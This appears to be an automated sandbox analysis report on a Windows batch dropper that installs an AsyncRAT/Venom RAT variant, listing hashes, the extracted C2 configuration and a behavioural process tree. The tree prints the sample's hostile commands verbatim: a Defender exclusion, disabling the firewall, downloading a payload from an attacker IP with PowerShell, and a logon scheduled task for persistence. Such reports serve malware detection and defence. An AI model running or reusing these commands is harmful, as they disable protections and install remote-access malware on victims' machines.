Analysis
-
max time kernel
64s -
max time network
65s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
25-10-2024 13:59
Static task
static1
Behavioral task
behavioral1
Sample
win10.cmd
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
win10.cmd
Resource
win10v2004-20241007-en
General
-
Target
win10.cmd
-
Size
3KB
-
MD5
e62a670dce5171d5ffc8cdc9d1897f1e
-
SHA1
1f1641255d816783f7eac72f7359dd886ddaa164
-
SHA256
37e3fb24bc4ea36c7363a55ca99539a5c91aa5600739a652deb3fbbbcab9b2d5
-
SHA512
f7615a367da1bfabc4cf9fad782154342c14bca6cca448b493cc3ee0328c1267f6b91beeb6e12ece409b72429eb9bb23154aaa682cb49157867b5d3c593d4557
Malware Config
Extracted
http://72.5.43.223/gdHydhxad/win10.zip
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Default
72.5.43.15:4449
yezcydjwbxouz
-
delay
1
-
install
true
-
install_file
win.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\runtime.exe family_asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1640 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2396 powershell.exe 2472 powershell.exe 1640 powershell.exe 2252 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 2768 netsh.exe -
Executes dropped EXE 5 IoCs
Processes:
runtime.exewin10.exewin10.exewin.exepid process 1396 runtime.exe 1976 win10.exe 2960 win10.exe 1208 1452 win.exe -
Loads dropped DLL 4 IoCs
Processes:
cmd.exewin10.exewin10.exepid process 2676 cmd.exe 1976 win10.exe 2960 win10.exe 1208 -
Processes:
resource yara_rule behavioral1/memory/2960-165-0x000007FEF2DE0000-0x000007FEF3246000-memory.dmp upx \Users\Admin\AppData\Local\Temp\_MEI19762\python310.dll upx -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\win10.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1256 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeruntime.exewin.exepid process 2396 powershell.exe 2472 powershell.exe 2252 powershell.exe 1640 powershell.exe 1396 runtime.exe 1396 runtime.exe 1396 runtime.exe 1452 win.exe 1452 win.exe 1452 win.exe 1452 win.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeruntime.exewin.exedescription pid process Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1396 runtime.exe Token: SeDebugPrivilege 1452 win.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
cscript.exepid process 2080 cscript.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
win.exepid process 1452 win.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
cmd.exepowershell.execscript.execmd.exewin10.exeruntime.execmd.execmd.exedescription pid process target process PID 1916 wrote to memory of 2300 1916 cmd.exe cacls.exe PID 1916 wrote to memory of 2300 1916 cmd.exe cacls.exe PID 1916 wrote to memory of 2300 1916 cmd.exe cacls.exe PID 1916 wrote to memory of 2396 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2396 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2396 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2472 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2472 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2472 1916 cmd.exe powershell.exe PID 2472 wrote to memory of 2768 2472 powershell.exe netsh.exe PID 2472 wrote to memory of 2768 2472 powershell.exe netsh.exe PID 2472 wrote to memory of 2768 2472 powershell.exe netsh.exe PID 1916 wrote to memory of 2252 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2252 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2252 1916 cmd.exe powershell.exe PID 1916 wrote to memory of 2660 1916 cmd.exe cscript.exe PID 1916 wrote to memory of 2660 1916 cmd.exe cscript.exe PID 1916 wrote to memory of 2660 1916 cmd.exe cscript.exe PID 2660 wrote to memory of 2676 2660 cscript.exe cmd.exe PID 2660 wrote to memory of 2676 2660 cscript.exe cmd.exe PID 2660 wrote to memory of 2676 2660 cscript.exe cmd.exe PID 2676 wrote to memory of 1640 2676 cmd.exe powershell.exe PID 2676 wrote to memory of 1640 2676 cmd.exe powershell.exe PID 2676 wrote to memory of 1640 2676 cmd.exe powershell.exe PID 2676 wrote to memory of 2080 2676 cmd.exe cscript.exe PID 2676 wrote to memory of 2080 2676 cmd.exe cscript.exe PID 2676 wrote to memory of 2080 2676 cmd.exe cscript.exe PID 2676 wrote to memory of 1396 2676 cmd.exe runtime.exe PID 2676 wrote to memory of 1396 2676 cmd.exe runtime.exe PID 2676 wrote to memory of 1396 2676 cmd.exe runtime.exe PID 2676 wrote to memory of 1976 2676 cmd.exe win10.exe PID 2676 wrote to memory of 1976 2676 cmd.exe win10.exe PID 2676 wrote to memory of 1976 2676 cmd.exe win10.exe PID 1976 wrote to memory of 2960 1976 win10.exe win10.exe PID 1976 wrote to memory of 2960 1976 win10.exe win10.exe PID 1976 wrote to memory of 2960 1976 win10.exe win10.exe PID 1396 wrote to memory of 1908 1396 runtime.exe cmd.exe PID 1396 wrote to memory of 1908 1396 runtime.exe cmd.exe PID 1396 wrote to memory of 1908 1396 runtime.exe cmd.exe PID 1396 wrote to memory of 2548 1396 runtime.exe cmd.exe PID 1396 wrote to memory of 2548 1396 runtime.exe cmd.exe PID 1396 wrote to memory of 2548 1396 runtime.exe cmd.exe PID 1908 wrote to memory of 1084 1908 cmd.exe schtasks.exe PID 1908 wrote to memory of 1084 1908 cmd.exe schtasks.exe PID 1908 wrote to memory of 1084 1908 cmd.exe schtasks.exe PID 2548 wrote to memory of 1256 2548 cmd.exe timeout.exe PID 2548 wrote to memory of 1256 2548 cmd.exe timeout.exe PID 2548 wrote to memory of 1256 2548 cmd.exe timeout.exe PID 2548 wrote to memory of 1452 2548 cmd.exe win.exe PID 2548 wrote to memory of 1452 2548 cmd.exe win.exe PID 2548 wrote to memory of 1452 2548 cmd.exe win.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\win10.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2300
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'www.google.nl' -OutFile C:\Users\Admin\AppData\Local\Temp\tmp.nl"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252 -
C:\Windows\system32\cscript.execscript /nologo C:\Users\Admin\AppData\Local\Temp\temprunner.vbs2⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\batman.cmd3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://72.5.43.223/gdHydhxad/win10.zip', 'C:\Users\Admin\AppData\Local\Temp/win10.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640 -
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\unzi.vbs"4⤵
- Suspicious use of FindShellTrayWindow
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\runtime.exe"C:\Users\Admin\AppData\Local\Temp\runtime.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:1084 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:1256 -
C:\Users\Admin\AppData\Roaming\win.exe"C:\Users\Admin\AppData\Roaming\win.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\win10.exe"C:\Users\Admin\AppData\Local\Temp\win10.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\win10.exe"C:\Users\Admin\AppData\Local\Temp\win10.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
480B
MD55ce986fa2a790561fd07738b25cb0eba
SHA142d06ebaf390356aea8e6830641bb3b22c24ba91
SHA25688a7a91b5c198a53e6ed7ec4c269adf5765fd208bf7c9b117da255f828dd9a6b
SHA512acc2ba285e6ecdec0f0d40e529c1ae085f5fd6d869f08b90b5b582b68265a6509df744d635c7e5fe0309153d344a614ca628e5d51d5727c457b9b2154d6940eb
-
Filesize
73KB
MD54fa7b1eec1fc84eb3a13c29e5a37aae7
SHA1dfff9fceeb4d74d7e82f9f0a65d1889fa0f9e326
SHA2565f5aa560b9b2d9f7ea3b9a4e05b9b9b35107dc78bd763000fe05f6b3f998f311
SHA5125e36a5589499a3db56d78de1b66a9ee57a2972bc57bf4b915df9118fd2a584c74ba00c61531d922431b72e87f9c53585c4c1a78a2aba122a22ea5e3603aa06ba
-
Filesize
153B
MD5cf980901c73aa6cfb5cc8353ee50ef87
SHA13a241bfc80ba171120893ce2354cf0019fee4c69
SHA256118148188be80ffe226f269f9bc06cc4dbf048479ceca3f408ae1a16e61899e6
SHA5124cdcc5dec7fe0cbf13d2c25cfbeaa47cd1da32a5acdde656059e0b02dba3691c31afa4989bf669ef590e431404d34462880e3018a041cd79671990acafa2fa22
-
Filesize
147B
MD5a0a23eb6e83f7435bda9b9f1845ed486
SHA1c8a3167355f7a75e9e3f99d8ba602d74009a604f
SHA256205005f743cceed5e96b734d7dee1ae74c0e181f6d64ca8e2267399094289052
SHA5120157301e36bbf85efa7404c1b2412ca4eb723d5bf94aad9961bf0ef89db83be9be9fd59210f3a198dfc3bc9d455e19886ffbb3734a17cb7c9c5f722f58519c20
-
Filesize
443B
MD5e12da1d567a5f3d33452903f44ad30fe
SHA130df139b3ab3f1f050152e4566d4421149458638
SHA256e61f086a6d387145b79c4e220b6a0772e992923068c7e22baa3e459298b08568
SHA5126e9c575cadcd2739b2b8511beb8a590744d81572331ad004097fe6d02d25412fd58425b8e70f016a79fa5495e75dd6d7c48599d3369fa0923638072a4c845ace
-
Filesize
14.7MB
MD5eba7aa775fcfec357583fd4803fa60d2
SHA194a3667f7b137e305aa45fb9d2cd3578fca8255b
SHA256e69138b703cdc4bf16367c468b9af1b5b7b56dbe2331ca1c34b46f7bad43ffe4
SHA512e0b8e105faa612287b6078f932ba5dce74af5489533d29104de198638c905391c7a0009f18e02dc148ace84ff0f7e283cd307f95234ebe6c59e628e99935641f
-
Filesize
14.5MB
MD5902aa8d1b070f89752a003b87acd57a4
SHA16ee72c2177abb3ccb56993eb0c0bf3314661fe19
SHA256262591e77da99450016dfd15ab19d5f84e577f567d47e15ebe4f7dbe935980ef
SHA51228ce31a3bd969c66bfbe0c42eaafd2f4b0ad7d0506f04c0019138832747c733a4021cb054bfe9c43425fa675b1a73bd4ceaa3040a7b865e58af5e74c20bdb91d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53e09c7795a644448b00c8954719457cb
SHA1f03cd7a656a4e3d17201e186e2ac1d766a5c14d2
SHA256fdd0ff4c77a1a106a621f82150db8ef3e569c2ba1a59d16a375db59b0df36391
SHA5122238da47b0438d89ed32633fea8508ab400fa2d2e4e5343211ade865609b506c174d295595ae18edd552349e2b9599f9aea5452592666fe14b04bf8758559700
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1.4MB
MD508812511e94ad9859492a8d19cafa63e
SHA1492b9fefb9cc5c7f80681ebfa373d48b3a600747
SHA2569742af9d1154293fa4c4fc50352430c22d56e8cdc99202c78533af182d96489c
SHA5126f7e41f4e2f893841329ac62315809a59a8d01ca047cb5739eb7ac1294afd4de2754549f7b1f5f9affa3397e9de379c5f6396844fc4fab9328362566225ddb8e